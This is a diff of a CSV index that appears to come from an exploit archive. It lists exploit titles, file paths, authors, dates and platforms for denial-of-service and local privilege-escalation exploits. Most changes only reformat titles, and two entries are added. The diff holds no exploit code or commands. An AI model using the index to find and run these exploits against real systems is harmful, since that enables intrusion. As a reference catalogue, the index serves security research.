39026,platforms/win_x86/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Dereference",2015-12-17,"Nils Sommer",win_x86,dos,0 39027,platforms/win_x86/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free",2015-12-17,"Nils Sommer",win_x86,dos,0 39037,platforms/windows/dos/39037.php,"Apache 2.4.17 - Denial of Service",2015-12-18,rUnViRuS,windows,dos,0 @@ -5288,7 +5288,7 @@ id,file,description,date,author,platform,type,port 40784,platforms/windows/dos/40784.html,"Microsoft Edge - 'FillFromPrototypes' Type Confusion",2016-11-18,"Google Security Research",windows,dos,0 40785,platforms/windows/dos/40785.html,"Microsoft Edge - 'Array.filter' Info Leak",2016-11-18,"Google Security Research",windows,dos,0 40786,platforms/windows/dos/40786.html,"Microsoft Edge - 'Array.reverse' Overflow",2016-11-18,"Google Security Research",windows,dos,0 -40790,platforms/linux/dos/40790.txt,"Palo Alto Networks PanOS appweb3 - Stack Buffer Overflow",2016-11-18,"Google Security Research",linux,dos,0 +40790,platforms/linux/dos/40790.txt,"Palo Alto Networks PanOS - appweb3 Stack Buffer Overflow",2016-11-18,"Google Security Research",linux,dos,0 40793,platforms/windows/dos/40793.html,"Microsoft Edge Scripting Engine - Memory Corruption (MS16-129)",2016-11-21,Security-Assessment.com,windows,dos,0 40797,platforms/windows/dos/40797.html,"Microsoft Edge - 'CText­Extractor::Get­Block­Text' Out-of-Bounds Read (MS16-104)",2016-11-21,Skylined,windows,dos,0 40798,platforms/windows/dos/40798.html,"Microsoft Internet Explorer 8 - jscript 'Reg­Exp­Base::FBad­Header' Use-After-Free (MS15-018)",2016-11-21,Skylined,windows,dos,0 @@ -5437,6 +5437,7 @@ id,file,description,date,author,platform,type,port 41792,platforms/multiple/dos/41792.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking",2017-04-04,"Google Security Research",multiple,dos,0 41797,platforms/macos/dos/41797.c,"Apple macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption",2017-04-04,"Google Security Research",macos,dos,0 41794,platforms/multiple/dos/41794.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 +41826,platforms/hardware/dos/41826.txt,"Cesanta Mongoose OS - Use-After-Free",2017-04-06,"Compass Security",hardware,dos,0 41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0 41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0 41790,platforms/macos/dos/41790.c,"Apple macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0 @@ -5460,6 +5461,7 @@ id,file,description,date,author,platform,type,port 41812,platforms/multiple/dos/41812.html,"Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 41813,platforms/multiple/dos/41813.html,"Apple WebKit - 'table' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 41814,platforms/multiple/dos/41814.html,"Apple WebKit - 'WebCore::toJS' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 +41823,platforms/windows/dos/41823.py,"CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)",2017-03-16,redr2e,windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -5510,7 +5512,7 @@ id,file,description,date,author,platform,type,port 205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation",2000-11-29,Tlabs,linux,local,0 206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0 -209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0 +209,platforms/linux/local/209.c,"GLIBC - '/bin/su' Privilege Escalation",2000-11-30,localcore,linux,local,0 210,platforms/solaris/local/210.c,"Solaris locale - Format Strings (noexec stack) Exploit",2000-11-30,warning3,solaris,local,0 215,platforms/linux/local/215.c,"GLIBC locale - bug mount Exploit",2000-12-02,sk8,linux,local,0 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386 Exploit",2000-12-02,"Michel Kaempf",linux,local,0 @@ -5816,7 +5818,7 @@ id,file,description,date,author,platform,type,port 2412,platforms/windows/local/2412.c,"Microsoft Windows Kernel - Privilege Escalation (MS06-049)",2006-09-21,SoBeIt,windows,local,0 2463,platforms/osx/local/2463.c,"Apple Mac OSX 10.4.7 - Mach Exception Handling Privilege Escalation",2006-09-30,xmath,osx,local,0 2464,platforms/osx/local/2464.pl,"Apple Mac OSX 10.4.7 - Mach Exception Handling Local Exploit (10.3.x)",2006-09-30,"Kevin Finisterre",osx,local,0 -2466,platforms/linux/local/2466.pl,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation",2006-10-01,"Clint Torrez",linux,local,0 +2466,platforms/linux/local/2466.pl,"cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation",2006-10-01,"Clint Torrez",linux,local,0 2492,platforms/linux/local/2492.s,".ELF Binaries - Privilege Escalation",2006-10-08,Sha0,linux,local,0 2543,platforms/solaris/local/2543.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local,0 2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0 @@ -5839,7 +5841,7 @@ id,file,description,date,author,platform,type,port 2873,platforms/windows/local/2873.c,"AtomixMP3 < 2.3 - '.m3u' Buffer Overflow",2006-11-30,"Greg Linares",windows,local,0 2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player 2.1 - Malformed '.PLF' Buffer Overflow (PoC)",2006-12-01,"Greg Linares",windows,local,0 2950,platforms/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,windows,local,0 -3024,platforms/windows/local/3024.c,"Microsoft Windows - NtRaiseHardError Csrss.exe Memory Disclosure",2006-12-27,"Ruben Santamarta",windows,local,0 +3024,platforms/windows/local/3024.c,"Microsoft Windows - NtRaiseHardError 'Csrss.exe' Memory Disclosure",2006-12-27,"Ruben Santamarta",windows,local,0 3070,platforms/osx/local/3070.pl,"VideoLAN VLC Media Player 0.8.6 (x86) - (udp://) Format String",2007-01-02,MoAB,osx,local,0 3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation",2007-01-03,erasmus,windows,local,0 3087,platforms/osx/local/3087.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation",2007-01-05,MoAB,osx,local,0 @@ -6668,7 +6670,7 @@ id,file,description,date,author,platform,type,port 14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",windows,local,0 14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 - 'wintab32.dll' DLL Hijacking",2010-08-25,CCNA,windows,local,0 14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",windows,local,0 -14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking",2010-08-25,storm,windows,local,0 +14778,platforms/windows/local/14778.c,"Microsoft Windows - Contacts 'wab32res.dll' DLL Hijacking",2010-08-25,storm,windows,local,0 14780,platforms/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking",2010-08-25,ALPdaemon,windows,local,0 14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local,0 14782,platforms/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking",2010-08-25,storm,windows,local,0 @@ -6929,7 +6931,7 @@ id,file,description,date,author,platform,type,port 17391,platforms/linux/local/17391.c,"Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Privilege Escalation",2011-06-11,"Dan Rosenberg",linux,local,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - '.fat' Buffer Overflow",2011-06-23,"Iván García Ferreira",windows,local,0 17449,platforms/windows/local/17449.py,"FreeAmp 2.0.7 - '.pls' Buffer Overflow",2011-06-24,"C4SS!0 G0M3S",windows,local,0 -17451,platforms/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (MS10-028) (Metasploit)",2011-06-26,Metasploit,windows,local,0 +17451,platforms/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll' '.DXF' File Handling (MS10-028) (Metasploit)",2011-06-26,Metasploit,windows,local,0 17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0 17473,platforms/windows/local/17473.txt,"Adobe Reader X 10.0.0 < 10.0.1 - Atom Type Confusion Exploit",2011-07-03,Snake,windows,local,0 17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 - '.RTF' Header Stack Overflow",2011-07-03,Snake,windows,local,0 @@ -7363,7 +7365,7 @@ id,file,description,date,author,platform,type,port 19912,platforms/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - /tmp Symlink",2000-05-10,foo,multiple,local,0 19915,platforms/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd - SHELL Environmental Variable",2000-05-16,Sebastian,linux,local,0 19925,platforms/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local,0 -19930,platforms/windows/local/19930.rb,"Microsoft Windows - Task Scheduler .XML Privilege Escalation (MS10-092) (Metasploit)",2012-07-19,Metasploit,windows,local,0 +19930,platforms/windows/local/19930.rb,"Microsoft Windows - Task Scheduler '.XML' Privilege Escalation (MS10-092) (Metasploit)",2012-07-19,Metasploit,windows,local,0 19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0 19946,platforms/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink",2000-04-21,anonymous,linux,local,0 19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0 @@ -7441,17 +7443,17 @@ id,file,description,date,author,platform,type,port 20213,platforms/aix/local/20213.txt,"AIX 4.2/4.3 - netstat -Z Statistic Clearing",2000-09-03,"alex medvedev",aix,local,0 20542,platforms/windows/local/20542.rb,"GlobalScape CuteZIP - Stack Buffer Overflow (Metasploit)",2012-08-15,Metasploit,windows,local,0 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Privilege Escalation",2000-06-24,"Stephen J. Friedl",sco,local,0 -20232,platforms/windows/local/20232.cpp,"Microsoft Windows NT 4/2000 - DLL Search Path",2000-09-18,"Georgi Guninski",windows,local,0 +20232,platforms/windows/local/20232.cpp,"Microsoft Windows NT 4.0/2000 - DLL Search Path",2000-09-18,"Georgi Guninski",windows,local,0 20241,platforms/palm_os/local/20241.txt,"Palm OS 3.5.2 - Weak Encryption",2000-09-26,@stake,palm_os,local,0 20250,platforms/linux/local/20250.c,"LBL Traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,linux,local,0 20251,platforms/linux/local/20251.c,"LBL Traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0 20252,platforms/linux/local/20252.c,"LBL Traceroute 1.4 a5 - Heap Corruption (3)",2000-09-28,"Michel Kaempf",linux,local,0 20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x - fstat Format String",2000-10-04,K2,openbsd,local,0 -20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0 +20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0/2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0 20543,platforms/windows/local/20543.rb,"Microsoft Windows - Service Trusted Path Privilege Escalation (Metasploit)",2012-08-15,Metasploit,windows,local,0 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (2)",2012-08-05,pole,windows,local,0 20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 - Permissions File Manipulation",1995-03-02,"Larry Glaze",irix,local,0 -20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request (MS00-003)",2000-10-03,"BindView's Razor Team",windows,local,0 +20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0/2000 - Spoofed LPC Request (MS00-003)",2000-10-03,"BindView's Razor Team",windows,local,0 20274,platforms/multiple/local/20274.pl,"IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",multiple,local,0 20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal - 'iplncal.sh' Permissions",2000-10-10,@stake,solaris,local,0 20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart'",2000-10-10,@stake,solaris,local,0 @@ -7627,7 +7629,7 @@ id,file,description,date,author,platform,type,port 21117,platforms/multiple/local/21117.txt,"Progress Database 8.3/9.1 - Multiple Buffer Overflow",2001-10-05,kf,multiple,local,0 21120,platforms/unix/local/21120.c,"Snes9x 1.3 - Local Buffer Overflow",2001-10-16,"Niels Heinen",unix,local,0 21124,platforms/linux/local/21124.txt,"Linux Kernel 2.2 / 2.4 - Ptrace/Setuid Exec Privilege Escalation",2001-10-18,"Rafal Wojtczuk",linux,local,0 -21130,platforms/windows/local/21130.c,"Microsoft Windows NT 3/4 - CSRSS Memory Access Violation",2001-10-26,"Michael Wojcik",windows,local,0 +21130,platforms/windows/local/21130.c,"Microsoft Windows NT 3/4.0 - CSRSS Memory Access Violation",2001-10-26,"Michael Wojcik",windows,local,0 21139,platforms/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 - Client Importer Buffer Overflow (Metasploit)",2012-09-08,Metasploit,windows,local,0 40418,platforms/windows/local/40418.txt,"Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation",2016-09-23,Tulpa,windows,local,0 21150,platforms/unix/local/21150.c,"Rational ClearCase 3.2/4.x - DB Loader TERM Environment Variable Buffer Overflow",2001-11-09,virtualcat,unix,local,0 @@ -7648,7 +7650,7 @@ id,file,description,date,author,platform,type,port 21244,platforms/unix/local/21244.pl,"Tarantella Enterprise 3 - gunzip Race Condition",2002-02-08,"Larry Cashdollar",unix,local,0 21247,platforms/linux/local/21247.c,"BRU 17.0 - SetLicense Script Insecure Temporary File Symbolic Link",2002-01-26,"Andrew Griffiths",linux,local,0 21248,platforms/linux/local/21248.txt,"(Linux Kernel 2.4.17-8) User-Mode Linux - Memory Access Privilege Escalation",2000-08-25,"Andrew Griffiths",linux,local,0 -21258,platforms/linux/local/21258.bat,"Microsoft Windows NT 4/2000 - NTFS File Hiding",2002-01-29,"Hans Somers",linux,local,0 +21258,platforms/linux/local/21258.bat,"Microsoft Windows NT 4.0/2000 - NTFS File Hiding",2002-01-29,"Hans Somers",linux,local,0 21259,platforms/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 - Segmentation Violation",2002-01-30,"Taeho Oh",linux,local,0 21280,platforms/linux/local/21280.c,"Hanterm 3.3 - Local Buffer Overflow (1)",2002-02-07,Xpl017Elz,linux,local,0 21281,platforms/linux/local/21281.c,"Hanterm 3.3 - Local Buffer Overflow (2)",2002-02-07,xperc,linux,local,0 @@ -7664,7 +7666,7 @@ id,file,description,date,author,platform,type,port 21331,platforms/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - MRUList201202.dat File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",windows,local,0 21341,platforms/linux/local/21341.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local,0 21342,platforms/linux/local/21342.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local,0 -21344,platforms/windows/local/21344.txt,"Microsoft Windows NT 4/2000 - Process Handle Local Privilege Elevation",2002-03-13,EliCZ,windows,local,0 +21344,platforms/windows/local/21344.txt,"Microsoft Windows NT 4.0/2000 - Process Handle Local Privilege Elevation",2002-03-13,EliCZ,windows,local,0 21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,php,local,0 21348,platforms/linux/local/21348.txt,"Webmin 0.x - Code Input Validation",2002-03-20,prophecy,linux,local,0 21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 - Weak Password Encryption",2002-03-22,c3rb3r,windows,local,0 @@ -7721,14 +7723,14 @@ id,file,description,date,author,platform,type,port 40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0 21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0 21683,platforms/linux/local/21683.c,"qmailadmin 1.0.x - Local Buffer Overflow",2002-08-06,"Thomas Cannon",linux,local,0 -21684,platforms/windows/local/21684.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0 -21685,platforms/windows/local/21685.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (2)",2002-08-06,"Oliver Lavery",windows,local,0 -21686,platforms/windows/local/21686.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (3)",2002-08-06,"Brett Moore",windows,local,0 -21687,platforms/windows/local/21687.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (4)",2002-08-06,"Brett Moore",windows,local,0 -21688,platforms/windows/local/21688.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (5)",2002-08-06,"Oliver Lavery",windows,local,0 -21689,platforms/windows/local/21689.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (6)",2002-08-06,"Brett Moore",windows,local,0 -21690,platforms/windows/local/21690.txt,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (7)",2002-08-06,"Ovidio Mallo",windows,local,0 -21691,platforms/windows/local/21691.txt,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0 +21684,platforms/windows/local/21684.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0 +21685,platforms/windows/local/21685.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (2)",2002-08-06,"Oliver Lavery",windows,local,0 +21686,platforms/windows/local/21686.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (3)",2002-08-06,"Brett Moore",windows,local,0 +21687,platforms/windows/local/21687.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (4)",2002-08-06,"Brett Moore",windows,local,0 +21688,platforms/windows/local/21688.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (5)",2002-08-06,"Oliver Lavery",windows,local,0 +21689,platforms/windows/local/21689.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (6)",2002-08-06,"Brett Moore",windows,local,0 +21690,platforms/windows/local/21690.txt,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (7)",2002-08-06,"Ovidio Mallo",windows,local,0 +21691,platforms/windows/local/21691.txt,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0 21700,platforms/linux/local/21700.c,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (1)",2002-08-10,"Gobbles Security",linux,local,0 21701,platforms/linux/local/21701.pl,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (2)",2002-08-10,"TESO Security",linux,local,0 21713,platforms/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)",2012-10-03,b33f,windows,local,0 @@ -7771,8 +7773,8 @@ id,file,description,date,author,platform,type,port 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module - Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0 21892,platforms/windows/local/21892.txt,"FileBound 6.2 - Privilege Escalation",2012-10-11,"Nathaniel Carew",windows,local,0 21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 - ERRPT Local Buffer Overflow",2003-04-16,watercloud,aix,local,0 -21922,platforms/windows/local/21922.c,"Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0 -21923,platforms/windows/local/21923.c,"Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0 +21922,platforms/windows/local/21922.c,"Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0 +21923,platforms/windows/local/21923.c,"Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0 21980,platforms/linux/local/21980.c,"Abuse 2.0 - Local Buffer Overflow",2002-11-01,Girish,linux,local,0 21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode SEH Exploit",2012-10-15,Dark-Puzzle,windows,local,0 21994,platforms/windows/local/21994.rb,"Microsoft Windows - Escalate Service Permissions Privilege Escalation (Metasploit)",2012-10-16,Metasploit,windows,local,0 @@ -7813,7 +7815,7 @@ id,file,description,date,author,platform,type,port 22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0 22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - 'mysqld' Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0 22344,platforms/linux/local/22344.txt,"Man Program 1.5 - Unsafe Return Value Command Execution",2003-03-11,"Jack Lloyd",linux,local,0 -22354,platforms/windows/local/22354.c,"Microsoft Windows Server 2000 - Help Facility .CNT File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0 +22354,platforms/windows/local/22354.c,"Microsoft Windows Server 2000 - Help Facility '.CNT' File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0 22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0 22363,platforms/linux/local/22363.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (2)",2003-04-10,"Wojciech Purczynski",linux,local,0 22376,platforms/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 - Format String",2003-03-28,"Core Security",linux,local,0 @@ -7978,7 +7980,7 @@ id,file,description,date,author,platform,type,port 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Privilege Escalation",2004-04-06,"Ian Vitek",windows,local,0 23921,platforms/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0 40400,platforms/windows/local/40400.txt,"SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local,0 -23989,platforms/windows/local/23989.c,"Microsoft Windows NT 4/2000 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0 +23989,platforms/windows/local/23989.c,"Microsoft Windows NT 4.0/2000 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg' Exploit",2013-01-09,"Debasish Mandal",windows,local,0 24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 - Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",windows,local,0 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x - Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,bsd,local,0 @@ -7997,7 +7999,7 @@ id,file,description,date,author,platform,type,port 24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow",2003-03-10,watercloud,hp-ux,local,0 24258,platforms/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Privilege Escalation",2013-01-20,LiquidWorm,windows,local,0 -24277,platforms/windows/local/24277.c,"Microsoft Windows NT 4/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local,0 +24277,platforms/windows/local/24277.c,"Microsoft Windows NT 4.0/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local,0 24278,platforms/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",linux,local,0 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0 24335,platforms/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",unix,local,0 @@ -8566,7 +8568,7 @@ id,file,description,date,author,platform,type,port 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0 40975,platforms/android/local/40975.rb,"Google Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0 -38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 +38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 (Build 10130) - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0 38200,platforms/windows/local/38200.txt,"Microsoft Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38201,platforms/windows/local/38201.txt,"Microsoft Windows - CreateObjectTask TileUserBroker Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 @@ -8833,7 +8835,7 @@ id,file,description,date,author,platform,type,port 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 -40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS root_reboot - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 +40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS - root_reboot Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0 40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0 40811,platforms/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,lin_x86-64,local,0 @@ -9480,7 +9482,7 @@ id,file,description,date,author,platform,type,port 